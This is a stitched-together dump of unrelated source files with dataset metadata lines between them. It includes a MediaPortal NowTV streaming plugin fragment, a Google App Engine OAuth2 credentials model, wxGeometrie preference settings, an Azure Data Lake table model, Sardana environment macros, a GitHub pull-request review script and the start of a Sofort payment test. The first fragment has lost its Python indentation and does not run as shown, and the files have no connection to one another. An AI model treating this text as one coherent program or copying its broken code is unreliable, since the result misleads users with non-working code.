Descr = self['liste'].getCurrent()[0][2]
Image = self['liste'].getCurrent()[0][3]
self['handlung'].setText(decodeHtml(Descr))
CoverHelper(self['coverArt']).getCover(Image)
Name = self['liste'].getCurrent()[0][0]
self['name'].setText(_("Selection:") + " " + self.Name + ":" + Name)
def keyOK(self):
id = self['liste'].getCurrent()[0][1]
if self.keyLocked or id == None:
return
url = 'https://api.nowtv.de/v3/movies/%s?fields=files' % id
getPage(url, agent=std_headers).addCallback(self.get_stream).addErrback(self.dataError)
def get_stream(self, data):
videoPrio = int(config.mediaportal.videoquali_others.value)
if videoPrio == 2:
bw = 1300
elif videoPrio in (0, 1):
bw = 600
nowdata = json.loads(data)
format = None
for node in nowdata["files"]["items"]:
if node['type'] != u'video/x-f4v':
continue
_bw = node.get('bitrate', 0)
app, play_path = remove_start(node['path'], '/').split('/', 1)
format = {
'url': 'rtmpe://fms.rtl.de',
'app': app,
'play_path': 'mp4:%s' % play_path,
'page_url': 'http://%s.rtl.de' % app,
'player_url': 'http://cdn.static-fra.de/now/vodplayer.swf',
'tbr': _bw,
}
if _bw == bw:
break
if format:
Name = self['liste'].getCurrent()[0][0]
if config.mediaportal.useRtmpDump.value:
final = "{url}' --playpath={play_path} --app={app} --swfVfy={player_url} --pageUrl={page_url} --timeout=120'".format(**format)
movieinfo = [str(final),Name]
self.session.open(PlayRtmpMovie, movieinfo, Name, playCallback=self.playRtmpStream)
else:
final = "{url} swfVfy=1 playpath={play_path} app={app} swfUrl={player_url} pageUrl={page_url} timeout=120".format(**format)
self.session.open(SimplePlayer, [(Name, str(final))], showPlaylist=False, ltype='nowtv')
else:
self.session.open(MessageBoxExt, _("No Streams found!"), MessageBoxExt.TYPE_INFO)
def playRtmpStream(self, movietitle, moviepath, movie_img, cont_cb=None, exit_cb=None):
self.playrtmp_cont_callback = cont_cb
self.playrtmp_exit_callback = exit_cb
self.session.openWithCallback(self.cb_Player, SimplePlayer, [(movietitle, moviepath, movie_img)], cover=False, showPlaylist=False, ltype='rtlnow-rtmp', useResume=False, bufferingOpt = 'rtmpbuffering')
def cb_Player(self, retval=None):
if retval == 'continue':
self.playrtmp_cont_callback()
else:
self.playrtmp_exit_callback() | gpl-2.0 | 3,022,125,555,762,989,000 | 36.72846 | 282 | 0.667105 | false |
yowmamasita/social-listener-exam | ferris/core/oauth2/user_credentials.py | 1 | 2290 | """
OAuth dance session
"""
from google.appengine.ext import ndb
from ferris.core.ndb import Model
from credentials_property import CredentialsProperty
from ndb_storage import NdbStorage
import hashlib
class UserCredentials(Model):
user = ndb.UserProperty(indexed=True)
scopes = ndb.StringProperty(repeated=True, indexed=False)
admin = ndb.BooleanProperty(indexed=True)
credentials = CredentialsProperty(indexed=False)
filter_scopes = ndb.ComputedProperty(lambda x: ','.join(sorted(x.scopes)), indexed=True)
@classmethod
def _get_kind(cls):
return '__ferris__oauth2_user_credentials'
@classmethod
def after_get(cls, key, item):
if item and item.credentials:
item.credentials = NdbStorage(key, 'credentials', item).get()
@classmethod
def _get_key(cls, user, scopes, admin):
scopes_hash = hashlib.sha1(','.join(sorted(scopes))).hexdigest()
return ndb.Key(cls, '%s:%s:%s' % (user, scopes_hash, True if admin else False))
@classmethod
def create(cls, user, scopes, credentials, admin):
key = cls._get_key(user, scopes, admin)
item = cls(key=key, user=user, scopes=scopes, credentials=credentials, admin=admin)
item.put()
return item
@classmethod
def find(cls, user=None, scopes=None, admin=False):
if user and scopes:
key = cls._get_key(user, scopes, admin)
x = key.get()
else:
q = cls.query()
if user:
q = q.filter(cls.user == user)
if scopes:
q = q.filter(cls.filter_scopes == ','.join(sorted(scopes)))
if admin:
q = q.filter(cls.admin == admin)
x = q.get()
if x:
cls.after_get(x.key, x)
return x
@classmethod
def delete_all(cls, user):
c = cls.query().filter(user=user)
for x in c:
x.key.delete()
def find_credentials(user=None, scopes=None, admin=None):
"""
Finds credentials that fit the criteria provided. If no user is provided,
the first set of credentials that have the given scopes and privilege level.
Returns None if no credentials are found.
"""
return UserCredentials.find(user, scopes, admin)
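# Usage sketch (assumes a signed-in App Engine user with stored credentials;
# the scope URL is illustrative):
#
#   creds = find_credentials(
#       user=users.get_current_user(),
#       scopes=['https://www.googleapis.com/auth/drive.readonly'])
#   if creds:
#       authed_http = creds.credentials.authorize(httplib2.Http())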
| mit | 1,136,767,489,607,611,600 | 29.945946 | 92 | 0.619214 | false |
wxgeo/geophar | wxgeometrie/param/options.py | 1 | 4911 | # -*- coding: utf-8 -*-
# WxGeometrie
# Dynamic geometry, graph plotter, and more for french mathematic teachers.
# Copyright (C) 2005-2013 Nicolas Pourcelot
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
#
######################################
# bool -> CheckBox
# file -> select a directory
# str -> TextCtrl
# (min, max) -> SpinCtrl
# [bool] -> CheckListBox
# ['item1', 'blabla2', ...] -> Choice
from copy import deepcopy
from io import IOBase as file
from .modules import modules as _modules, descriptions_modules
class Rubrique(list):
def __init__(self, titre):
self.titre = titre
list.__init__(self)
def add(self, value):
list.append(self, value)
return value
class Options(Rubrique):
pass
class Theme(Rubrique):
pass
class Section(Rubrique):
pass
class Parametre(object):
def __init__(self, _texte, _get = (lambda x:x), _set = (lambda x:x), **kw):
assert len(kw) == 1
self.nom, self.type = kw.popitem()
if '__' in self.nom:
self.prefixe, self.key = self.nom.split('__', 1)
else:
self.prefixe = self.nom
self.key = None
self._get = _get
self._set = _set
self.defaut = deepcopy(self.valeur)
self.texte = _texte
def _get_val(self):
from .. import param
if self.key is None:
val = getattr(param, self.nom)
else:
val = getattr(param, self.prefixe)[self.key]
return self._get(val)
def _set_val(self, val):
from .. import param
val = self._set(val)
if self.key is None:
setattr(param, self.nom, val)
else:
getattr(param, self.prefixe)[self.key] = val
valeur = property(_get_val, _set_val)
P = Parametre
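# Example: P('Decimal places', decimales=(0, 10)) binds to param.decimales,
# while a double-underscore name such as modules_actifs__foo binds to the
# dictionary entry param.modules_actifs['foo'] (see Parametre.__init__ above).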
options = Options('Préférences')
## GENERAL
general = options.add(Theme('Général'))
general.add(P('Utilisateur', utilisateur = str))
general.add(P("Nombre maximal d'annulations", nbr_annulations = (0, 1000)))
ouverture = general.add(Section('Au démarrage'))
ouverture.add(P('Restaurer automatiquement la session précédente.', auto_restaurer_session=bool))
fermeture = general.add(Section('À la fermeture'))
fermeture.add(P('Demander confirmation avant de quitter.', confirmer_quitter = bool))
fermeture.add(P('Sauvegarder les préférences.', sauver_preferences = bool))
auto = general.add(Section('Sauvegarde automatique'))
auto.add(P('Intervalle entre deux sauvegardes', sauvegarde_automatique = (0, 10000)))
auto.add('Temps (en dizaine de s) entre deux sauvegardes automatiques.')
auto.add('La valeur 0 désactive la sauvegarde automatique.')
## MODULES
modules = options.add(Theme('Modules'))
liste = modules.add(Section('Activer les modules suivants'))
for nom in _modules:
d = {'modules_actifs__' + nom: bool}
liste.add(P(descriptions_modules[nom]['titre'], **d))
modules.add('Nota: les modules non activés par défaut peuvent être non documentés\net/ou encore expérimentaux.')
#modules.add(P(u'Activer les modules suivants', modules_actifs = dict))
## FORMAT
format = options.add(Theme('Format'))
format.add(P('Décimales affichées', decimales=(0, 10)))
format.add(P('Unité d\'angle',
             _get = (lambda k: {'d': 'degré', 'r': 'radian', 'g': 'grade'}[k]),
_set = (lambda s: s[0]),
unite_angle = ['degré', 'radian', 'grade']
))
format.add(P('Séparateur décimal',
_get = (lambda k: {',': 'virgule', '.': 'point'}[k]),
_set = (lambda k: {'virgule': ',', 'point': '.'}[k]),
separateur_decimal = ['virgule', 'point']
))
## AVANCÉ
avance = options.add(Theme('Avancé'))
export = avance.add(Section("Export"))
export.add(P("Résolution des images PNG", dpi_export=(10, 10000)))
sauvegarde = avance.add(Section("Sauvegarde"))
sauvegarde.add(P("Compresser les fichiers .geo par défaut.", compresser_geo=bool))
empl_pref = avance.add(Section("Répertoires d'enregistrement"))
empl_pref.add(P("Préférences", emplacements__preferences=open))
empl_pref.add(P("Session", emplacements__session=open))
empl_pref.add(P("Rapports d'erreur", emplacements__log=open))
| gpl-2.0 | 6,670,033,521,094,492,000 | 31.744966 | 112 | 0.64296 | false |
Azure/azure-sdk-for-python | sdk/datalake/azure-mgmt-datalake-analytics/azure/mgmt/datalake/analytics/catalog/models/usql_table.py | 1 | 3104 | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from .catalog_item import CatalogItem
class USqlTable(CatalogItem):
"""A Data Lake Analytics catalog U-SQL table item.
:param compute_account_name: the name of the Data Lake Analytics account.
:type compute_account_name: str
:param version: the version of the catalog item.
:type version: str
:param database_name: the name of the database.
:type database_name: str
:param schema_name: the name of the schema associated with this table and
database.
:type schema_name: str
:param name: the name of the table.
:type name: str
:param column_list: the list of columns in this table
:type column_list:
list[~azure.mgmt.datalake.analytics.catalog.models.USqlTableColumn]
:param index_list: the list of indices in this table
:type index_list:
list[~azure.mgmt.datalake.analytics.catalog.models.USqlIndex]
:param partition_key_list: the list of partition keys in the table
:type partition_key_list: list[str]
:param external_table: the external table associated with the table.
:type external_table:
~azure.mgmt.datalake.analytics.catalog.models.ExternalTable
:param distribution_info: the distributions info of the table
:type distribution_info:
~azure.mgmt.datalake.analytics.catalog.models.USqlDistributionInfo
"""
_attribute_map = {
'compute_account_name': {'key': 'computeAccountName', 'type': 'str'},
'version': {'key': 'version', 'type': 'str'},
'database_name': {'key': 'databaseName', 'type': 'str'},
'schema_name': {'key': 'schemaName', 'type': 'str'},
'name': {'key': 'tableName', 'type': 'str'},
'column_list': {'key': 'columnList', 'type': '[USqlTableColumn]'},
'index_list': {'key': 'indexList', 'type': '[USqlIndex]'},
'partition_key_list': {'key': 'partitionKeyList', 'type': '[str]'},
'external_table': {'key': 'externalTable', 'type': 'ExternalTable'},
'distribution_info': {'key': 'distributionInfo', 'type': 'USqlDistributionInfo'},
}
def __init__(self, **kwargs):
super(USqlTable, self).__init__(**kwargs)
self.database_name = kwargs.get('database_name', None)
self.schema_name = kwargs.get('schema_name', None)
self.name = kwargs.get('name', None)
self.column_list = kwargs.get('column_list', None)
self.index_list = kwargs.get('index_list', None)
self.partition_key_list = kwargs.get('partition_key_list', None)
self.external_table = kwargs.get('external_table', None)
self.distribution_info = kwargs.get('distribution_info', None)
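# Construction sketch (keyword names mirror the attributes documented above;
# the values are illustrative):
#
#   table = USqlTable(database_name='master', schema_name='dbo',
#                     name='Orders', partition_key_list=['OrderDate'])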
| mit | -7,905,476,458,018,455,000 | 45.328358 | 89 | 0.632088 | false |
wonder-sk/inasafe | safe/impact_functions/generic/classified_polygon_building/metadata_definitions.py | 1 | 4200 | # coding=utf-8
"""InaSAFE Disaster risk tool by Australian Aid - Generic Polygon on Building
Metadata Definitions.
Contact : [email protected]
.. note:: This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
"""
from safe.common.utilities import OrderedDict
from safe.definitions import (
layer_mode_classified,
layer_geometry_polygon,
layer_geometry_point,
hazard_all,
hazard_category_multiple_event,
exposure_structure,
all_vector_hazard_classes,
hazard_category_single_event,
structure_class_field
)
from safe.impact_functions.impact_function_metadata import \
ImpactFunctionMetadata
from safe.utilities.i18n import tr
class ClassifiedPolygonHazardBuildingFunctionMetadata(ImpactFunctionMetadata):
"""Metadata for ClassifiedPolygonBuildingFunctionMetadata.
.. versionadded:: 3.1
We only need to re-implement as_dict(), all other behaviours
are inherited from the abstract base class.
"""
@staticmethod
    def as_dict():
        """Return metadata as a dictionary.

        This is a static method. You can use it to get the metadata in
        dictionary format for an impact function.

        :returns: A dictionary representing all the metadata for the
            concrete impact function.
        :rtype: dict
        """
        dict_meta = {
'id': 'ClassifiedPolygonHazardBuildingFunction',
'name': tr('Classified polygon hazard on buildings'),
'impact': tr('Be affected'),
'title': tr('Be affected'),
'function_type': 'old-style',
'author': 'Akbar Gumbira ([email protected])',
'date_implemented': '17/04/2015',
'overview': tr(
'To assess the impact of each hazard zone on buildings.'),
'detailed_description': '',
'hazard_input': tr(
'The hazard layer must be a polygon layer. This layer '
'must have an attribute representing the hazard '
'zone that can be specified in the impact function options.'),
'exposure_input': tr(
'Vector polygon layer extracted from OSM where each '
'polygon represents the footprint of a building.'),
'output': tr(
'A vector layer of buildings with each tagged according to '
'the hazard zone in which it falls.'),
'actions': tr(
'Provide details about how many buildings fall within '
'each hazard zone.'),
'limitations': [],
'citations': [],
'layer_requirements': {
'hazard': {
'layer_mode': layer_mode_classified,
'layer_geometries': [layer_geometry_polygon],
'hazard_categories': [
hazard_category_multiple_event,
hazard_category_single_event
],
'hazard_types': hazard_all,
'continuous_hazard_units': [],
'vector_hazard_classifications':
all_vector_hazard_classes,
'raster_hazard_classifications': [],
'additional_keywords': []
},
'exposure': {
'layer_mode': layer_mode_classified,
'layer_geometries': [
layer_geometry_point,
layer_geometry_polygon
],
'exposure_types': [exposure_structure],
'exposure_units': [],
'exposure_class_fields': [structure_class_field],
'additional_keywords': []
}
},
'parameters': OrderedDict([
# The attribute of hazard zone in hazard layer
('hazard zone attribute', 'KRB')
])
}
"""Return metadata as a dictionary.
This is a static method. You can use it to get the metadata in
dictionary format for an impact function.
:returns: A dictionary representing all the metadata for the
concrete impact function.
:rtype: dict
"""
return dict_meta
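# Example: ClassifiedPolygonHazardBuildingFunctionMetadata.as_dict()['id']
# evaluates to 'ClassifiedPolygonHazardBuildingFunction'.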
| gpl-3.0 | -3,033,253,050,380,177,000 | 37.888889 | 78 | 0.56119 | false |
sagiss/sardana | src/sardana/macroserver/macros/env.py | 1 | 11795 | ##############################################################################
##
## This file is part of Sardana
##
## http://www.sardana-controls.org/
##
## Copyright 2011 CELLS / ALBA Synchrotron, Bellaterra, Spain
##
## Sardana is free software: you can redistribute it and/or modify
## it under the terms of the GNU Lesser General Public License as published by
## the Free Software Foundation, either version 3 of the License, or
## (at your option) any later version.
##
## Sardana is distributed in the hope that it will be useful,
## but WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
## GNU Lesser General Public License for more details.
##
## You should have received a copy of the GNU Lesser General Public License
## along with Sardana. If not, see <http://www.gnu.org/licenses/>.
##
##############################################################################
"""Environment related macros"""
__all__ = ["dumpenv", "load_env", "lsenv", "senv", "usenv"]
__docformat__ = 'restructuredtext'
from taurus.console.list import List
from sardana.macroserver.macro import *
################################################################################
#
# Environment related macros
#
################################################################################
from lxml import etree
def reprValue(v, max=74):
# cut long strings
v = str(v)
if len(v) > max:
v = v[:max] + ' [...]'
return v
class dumpenv(Macro):
"""Dumps the complete environment"""
def run(self):
env = self.getGlobalEnv()
out = List(['Name','Value','Type'])
for k,v in env.iteritems():
str_v = reprValue(v)
type_v = type(v).__name__
out.appendRow([str(k), str_v, type_v])
for line in out.genOutput():
self.output(line)
class lsvo(Macro):
"""Lists the view options"""
def run(self):
vo = self.getViewOptions()
out = List(['View option', 'Value'])
for key, value in vo.items():
out.appendRow([key, str(value)])
for line in out.genOutput():
self.output(line)
class setvo(Macro):
"""Sets the given view option to the given value"""
param_def = [['name', Type.String, None, 'View option name'],
['value', Type.String, None, 'View option value']]
def run(self, name, value):
try:
value = eval(value)
except:
pass
self.setViewOption(name, value)
class usetvo(Macro):
"""Resets the value of the given view option"""
param_def = [['name', Type.String, None, 'View option name']]
def run(self, name):
self.resetViewOption(name)
class lsenv(Macro):
"""Lists the environment in alphabetical order"""
param_def = [
['macro_list',
ParamRepeat(['macro', Type.MacroClass, None, 'macro name'], min=0),
None, 'List of macros to show environment'],
]
def prepare(self, macro_list, **opts):
self.table_opts = opts
def run(self, macro_list):
# list the environment for the current door
if len(macro_list) == 0:
# list All the environment for the current door
out = List(['Name', 'Value', 'Type'])
env = self.getAllDoorEnv()
names_list = list(env.keys())
names_list.sort(key=str.lower)
for k in names_list:
str_val = self.reprValue(env[k])
type_name = type(env[k]).__name__
out.appendRow([k, str_val, type_name])
# list the environment for the current door for the given macros
else:
out = List(['Macro', 'Name', 'Value', 'Type'])
for macro in macro_list:
env = self.getEnv(key=None, macro_name=macro.name)
names_list = list(env.keys())
names_list.sort(key=str.lower)
for k in names_list:
str_val = self.reprValue(env[k])
type_name = type(env[k]).__name__
out.appendRow([macro.name, k, str_val, type_name])
for line in out.genOutput():
self.output(line)
def reprValue(self, v, max=54):
# cut long strings
v = str(v)
if len(v) > max: v = '%s [...]' % v[:max]
return v
class senv(Macro):
"""Sets the given environment variable to the given value"""
param_def = [['name', Type.Env, None,
'Environment variable name. Can be one of the following:\n' \
' - <name> - global variable\n' \
' - <full door name>.<name> - variable value for a specific door\n' \
' - <macro name>.<name> - variable value for a specific macro\n' \
' - <full door name>.<macro name>.<name> - variable value for a specific macro running on a specific door'],
['value_list',
ParamRepeat(['value', Type.String, None, 'environment value item'], min=1),
None, 'value(s). one item will eval to a single element. More than one item will eval to a tuple of elements'],
]
def run(self, env, value):
if len(value) == 1:
value = value[0]
else:
value = '(%s)' % ', '.join(value)
k,v = self.setEnv(env, value)
line = '%s = %s' % (k, str(v))
self.output(line)
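# Typical usage of the macro above from a Spock prompt (illustrative values;
# ScanDir and ActiveMntGrp are common Sardana environment variables):
#
#   senv ScanDir /tmp/scans
#   senv ActiveMntGrp mntgrp01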
class usenv(Macro):
"""Unsets the given environment variable"""
param_def = [
['environment_list',
ParamRepeat(['env', Type.Env, None, 'Environment variable name'], min=1),
None, 'List of environment items to be removed'],
]
def run(self, env):
self.unsetEnv(env)
self.output("Success!")
class load_env(Macro):
""" Read environment variables from config_env.xml file"""
def run(self):
doc = etree.parse("config_env.xml")
root = doc.getroot()
for element in root:
if element.find("./name").text == "auto_filter":
self.output("Loading auto_filter variables:")
filter_max_elem = element.find(".//FilterMax")
if filter_max_elem is not None:
filter_max = filter_max_elem.text
self.setEnv("FilterMax", filter_max)
self.output("FilterMax loaded")
else:
self.output("FilterMax not found")
filter_min_elem = element.find(".//FilterMin")
if filter_min_elem is not None:
                    filter_min = filter_min_elem.text
self.setEnv("FilterMin", filter_min)
self.output("FilterMin loaded")
else:
self.output("FilterMin not found")
filter_delta_elem = element.find(".//FilterDelta")
if filter_delta_elem is not None:
filter_delta = filter_delta_elem.text
self.setEnv("FilterDelta", filter_delta)
self.output("FilterDelta loaded")
else:
self.output("FilterDelta not found")
filter_signal_elem = element.find(".//FilterSignal")
if filter_signal_elem is not None:
filter_signal = filter_signal_elem.text
self.setEnv("FilterSignal", filter_signal)
self.output("FilterSignal loaded")
else:
self.output("FilterSignal not found")
filter_absorber_elem = element.find(".//FilterAbsorber")
if filter_absorber_elem is not None:
filter_absorber = filter_absorber_elem.text
self.setEnv("FilterAbsorber", filter_absorber)
self.output("FilterAbsorber loaded")
else:
self.output("FilterAbsorber not found")
auto_filter_elem = element.find(".//AutoFilter")
if auto_filter_elem is not None:
auto_filter = auto_filter_elem.text
self.setEnv("AutoFilter", auto_filter)
self.output("AutoFilter loaded")
else:
self.output("AutoFilter not found")
if element.find("./name").text == "auto_beamshutter":
self.output("Loading auto_beamshutter variables:")
auto_beamshutter_elem = element.find(".//AutoBeamshutter")
if auto_beamshutter_elem is not None:
auto_beamshutter = auto_beamshutter_elem.text
self.setEnv("AutoBeamshutter", auto_beamshutter)
self.output("AutoBeamshutter loaded")
else:
self.output("AutoBeamshutter not found")
beamshutter_limit_elem = element.find(".//BeamshutterLimit")
if beamshutter_limit_elem is not None:
beamshutter_limit = beamshutter_limit_elem.text
self.setEnv("BeamshutterLimit", beamshutter_limit)
self.output("BeamshutterLimit loaded")
else:
self.output("BeamshutterLimit not found")
beamshutter_signal_elem = element.find(".//BeamshutterSignal")
if beamshutter_signal_elem is not None:
beamshutter_signal = beamshutter_signal_elem.text
self.setEnv("BeamshutterSignal", beamshutter_signal)
self.output("BeamshutterSignal loaded")
else:
self.output("BeamshutterSignal not found")
beamshutter_time_elem = element.find(".//BeamshutterTime")
if beamshutter_time_elem is not None:
beamshutter_time = beamshutter_time_elem.text
self.setEnv("BeamshutterTime", beamshutter_time)
self.output("BeamshutterTime loaded")
else:
self.output("BeamshutterTime not found")
if element.find("./name").text == "exafs":
self.output("Loading exafs variables:")
exafs_int_times_elem = element.find(".//ExafsIntTimes")
if exafs_int_times_elem is not None:
exafs_int_times = exafs_int_times_elem.text
self.setEnv("ExafsIntTimes", exafs_int_times)
self.output("ExafsIntTimes loaded")
else:
self.output("ExafsIntTimes not found")
exafs_nb_intervals_elem = element.find(".//ExafsNbIntervals")
if exafs_nb_intervals_elem is not None:
exafs_nb_intervals = exafs_nb_intervals_elem.text
self.setEnv("ExafsNbIntervals", exafs_nb_intervals)
self.output("ExafsNbIntervals loaded")
else:
self.output("ExafsNbIntervals not found")
exafs_regions_elem = element.find(".//ExafsRegions")
if exafs_regions_elem is not None:
exafs_regions = exafs_regions_elem.text
self.setEnv("ExafsRegions", exafs_regions)
self.output("ExafsRegions loaded")
else:
self.output("ExafsRegions not found")
misc_tree = root.find("./miscellaneous")
if misc_tree is not None:
for parameter in misc_tree:
if parameter.tag != "name":
self.setEnv(parameter.tag, parameter.text)
| lgpl-3.0 | -1,919,864,048,921,423,600 | 39.954861 | 129 | 0.527596 | false |
easybeta/github-autopullrequest | github-autopullrequest.py | 1 | 10757 | '''
github-autopullrequest.py - Created by Eric Betancourt [[email protected]]
This script helps automate code reviews of pull requests to specified GitHub repositories.
Using the GitHub API (documented at https://api.github.com/) the script scans the
currently open pull requests for a specified working directory and reports whether or not
each open pull request contains 'interesting items', which are specified in a config file
titled "interesting-config.json".
Examples of Interesting Items:
- Any change to the specified files or directories
- Does not contain changes to any files in the specified directory
- Any added or deleted lines contain the follow words (not as substrings of larger words):
/dev/null
raise
.write
Example
> review cuckoobox/cuckoo
https://api.github.com/repos/cuckoobox/cuckoo/pulls/310 - Not Interesting
https://api.github.com/repos/cuckoobox/cuckoo/pulls/308 - Interesting
Found {'+':'raise'} on line 30 in modules/processing/analysisinfo.py
Found {'+':'raise'} on line 33 in modules/processing/analysisinfo.py
'''
#! /usr/bin/python
import sys, re
import requests
import json
# Default Configuration File
config_file = 'interesting-config.json'
# Default Working Directory
working_dir = []
verbose = True
interestingItems = []
# Multiline compare checks n previous and upcoming lines around the line being compared.
def multiline_compare(array, idx, mod_idx, check_int):
match = True
check_count = -abs(check_int)
while check_count <= abs(check_int):
if array[idx + check_count] and array[mod_idx + check_count]:
if array[idx + check_count] != array[mod_idx + check_count]:
match = False
break
check_count = check_count + 1
return match
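# Caveat: near the edges of `array`, idx + check_count can go negative (Python
# then indexes from the end of the list, comparing unrelated lines) or run past
# the end (raising IndexError). Guarding each access with
# 0 <= idx + check_count < len(array) would make the window comparison strict.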
# Determine line number for the modified code. Begin by checking the patch info line, if
# the current line was just added, use the '+' start number, if the current line was
# removed , use the '-' start number. Then parse through patch lines of code, incrementing
# the counter on each unmodified line, and on each '+' line (if current line was added), or
# on each '-' line (if current line was removed).
def determine_line(patch_array, mod_symbol, mod_idx):
line_count = 0
for idx, line in enumerate(patch_array):
if line[0] == '@':
if mod_symbol == '+':
line_count = int(re.match(r'.*\+([0-9]+),', line).group(1))
else:
mod_symbol = '-'
line_count = int(re.match(r'.*-([0-9]+),', line).group(1))
line_count = line_count - 1
else:
if (line[0] == ' ') or \
(line[0] == '+' and mod_symbol=='+') or \
(line[0] == '-' and mod_symbol=='-'):
line_count = line_count + 1
if line == patch_array[mod_idx]:
if multiline_compare(patch_array, idx, mod_idx, 3):
break
return line_count
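# Worked example: for the hunk header '@@ -10,3 +12,4 @@' with mod_symbol '+',
# the regex extracts 12, line_count starts at 12 - 1 = 11, and it is then
# incremented on every ' ' and '+' line until the modified line (together with
# up to 3 lines of surrounding context) matches.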
# search_keyword() first loads the modified-file JSON data from GitHub, then
# isolates each file's 'patch' data and searches every modified line for each
# keyword using regular expressions: a match for the word plus any surrounding
# non-whitespace characters is captured first, and that captured string is then
# compared to the original keyword to verify it is not a substring of a larger
# word. Finally the line number is determined and a description is written up
# to be displayed.
def search_keyword(html_request, keywords):
keyword_found = False
description = []
idx = 0
while True:
try:
repoItem = json.loads(html_request.text or html_request.content)[idx]
            # Files without a 'patch' entry (e.g. binary files) are skipped.
            if 'patch' not in repoItem:
                idx = idx + 1
                continue
            patchItem = repoItem['patch'].encode('utf8').split('\n')
line_idx = 0
for line in patchItem:
for word in keywords:
if word[0].isalpha(): # if keyword is standalone function
search_string = '(\\S*%s\\S*)' % word
elif word[0] == '.' or word[0] == '/': # if keyword is sub-function or directory
search_string = '(%s\\w*)' % word
else:
search_string = word
if line[0] == '+' or line[0] == '-':
matches = re.findall(search_string, line, re.M)
if matches:
for match in matches:
if match in word:
line_num = determine_line(patchItem, line[0], line_idx)
if verbose:
description.append("Found {'%s':'%s'} on line %d in %s" % (line[0], match, line_num, repoItem['filename']))
#description.append('%s' % line)
keyword_found = True
#else: # Show failed matches (usually when keyword is sub-string)
#if verbose:
#print "%s - line %d - ['%s':'%s']\n%s - %s" % (repoItem['filename'], determine_line(patchItem, line[0], line_idx), match, word, line, match)
line_idx = line_idx + 1
except IndexError:
break
idx = idx + 1
return keyword_found, description
# check_filename() requests the modified-file JSON data from GitHub, then
# searches each 'filename' entry in the JSON pulls data for the given names.
def check_filename(html_request, filenames):
name_found = False
description = []
idx = 0
while True:
try:
repoItem = json.loads(html_request.text or html_request.content)[idx]
for name in filenames:
if name in repoItem['filename']:
description.append('Located %s in %s' % (name, repoItem['filename']))
name_found = True
except IndexError:
break
idx = idx + 1
return name_found, description
# determine_interesting() first pulls the pull request's 'files' JSON data,
# then calls the helpers check_filename() and search_keyword() to decide
# whether the pull is interesting.
def determine_interesting(pull_id, curr_working_dir):
interest_found = 'Not Interesting'
file_changes_good, file_changes_bad, line_keywords = [], [], []
description = []
for idx, item in enumerate(interestingItems):
if item['type'] == 'fileChange' and item['modifyOk']:
file_changes_good.append(item['keyword'])
elif item['type'] == 'fileChange' and not item['modifyOk']:
file_changes_bad.append(item['keyword'])
elif item['type'] == 'lineKeyword':
line_keywords.append(item['keyword'])
try:
html_request = requests.get('https://api.github.com/repos/%s/pulls/%d/files?page=%d&per_page=100' % (curr_working_dir, pull_id, 1))
if(html_request.ok and html_request.text != '[]'):
# Any change to these files or directories:
result, output = check_filename(html_request, file_changes_good)
if result == True:
interest_found = 'Interesting'
description.extend(output)
# Does not contain changes to these files or directories:
for fileentry in file_changes_bad:
                # Wrap the single entry in a list; passing a bare string would
                # make check_filename() iterate over its characters.
                result, output = check_filename(html_request, [fileentry])
if result != True:
interest_found = 'Interesting'
description.append("No changes to entry %s" % fileentry)
# Any added or deleted lines contain the follow words (not as substrings of larger words):
result, output = search_keyword(html_request, line_keywords)
if result == True:
interest_found = 'Interesting'
description.extend(output)
except Exception as e:
print "Error while executing github-autopullrequest.py during pull '%s/pulls/%d'." % (curr_working_dir, pull_id)
print e
return interest_found, description
# main() determines which pulls belong to each configured working directory,
# then evaluates the interestingness of each pull. Results, with line numbers,
# are then printed to the terminal.
def main(argv):
global working_dirs, verbose, interestingItems
try:
with open(config_file, 'r') as json_data:
readin = json.load(json_data)
working_dirs = readin['workingDirectory']
verbose = readin['verbose']
interestingItems = readin['interestingItems']
if verbose:
print 'Working Directory:'
for idx, line in enumerate(working_dirs):
print '\t%s' % line['name']
print 'Verbose:', verbose
print 'Interesting Items:'
for idx, line in enumerate(interestingItems):
print '\t%s - %s' % (line['type'], line['keyword'])
json_data.close()
except Exception as e:
print e
for idx, dir in enumerate(working_dirs):
curr_dir = str(dir['name'])
pageNum = 1
while True:
try:
r = requests.get('https://api.github.com/repos/%s/pulls?page=%d&per_page=100' % (curr_dir, pageNum))
if(r.ok and r.text != '[]'):
print "Pull Request Urls - '%s' - Page %d:" % (curr_dir, pageNum)
idx = 0
while True:
try:
repoItem = json.loads(r.text or r.content)[idx]
pull_interest, interest_description = determine_interesting(repoItem['number'], curr_dir)
print repoItem['url'] + ' - ' + pull_interest
for line in interest_description:
print '\t' + line
except IndexError:
break
idx = idx + 1
else:
match = re.search('\"message\":\"(.*)\",', r.text)
if match:
print "Unable to perform Pulls Request on '%s' - '%s'" % (curr_dir, match.group(1))
else:
print "Pulls Requests Complete for '%s'." % curr_dir
break
except Exception as e:
print "Error while executing github-autopullrequest.py with directory '%s'." % curr_dir
print e
break
pageNum = pageNum + 1
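# Hedged example (not from the original repo): main() assumes config_file contains
# JSON shaped like the following -- the key names come from the readin[...] lookups
# above, while the concrete values are illustrative only.
# {
#   "workingDirectory": [{"name": "owner/repo"}],
#   "verbose": true,
#   "interestingItems": [
#     {"type": "fileChange", "keyword": "src/core/", "modifyOk": true},
#     {"type": "fileChange", "keyword": "docs/", "modifyOk": false},
#     {"type": "lineKeyword", "keyword": "password"}
#   ]
# }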
if __name__ == '__main__':
main(sys.argv)
| mpl-2.0 | -5,248,136,591,977,777,000 | 42.550607 | 181 | 0.561309 | false |
artursmet/django-payments | payments/sofort/test_sofort.py | 1 | 3494 | from __future__ import unicode_literals
from unittest import TestCase
from mock import patch, MagicMock, Mock
import json
from . import SofortProvider
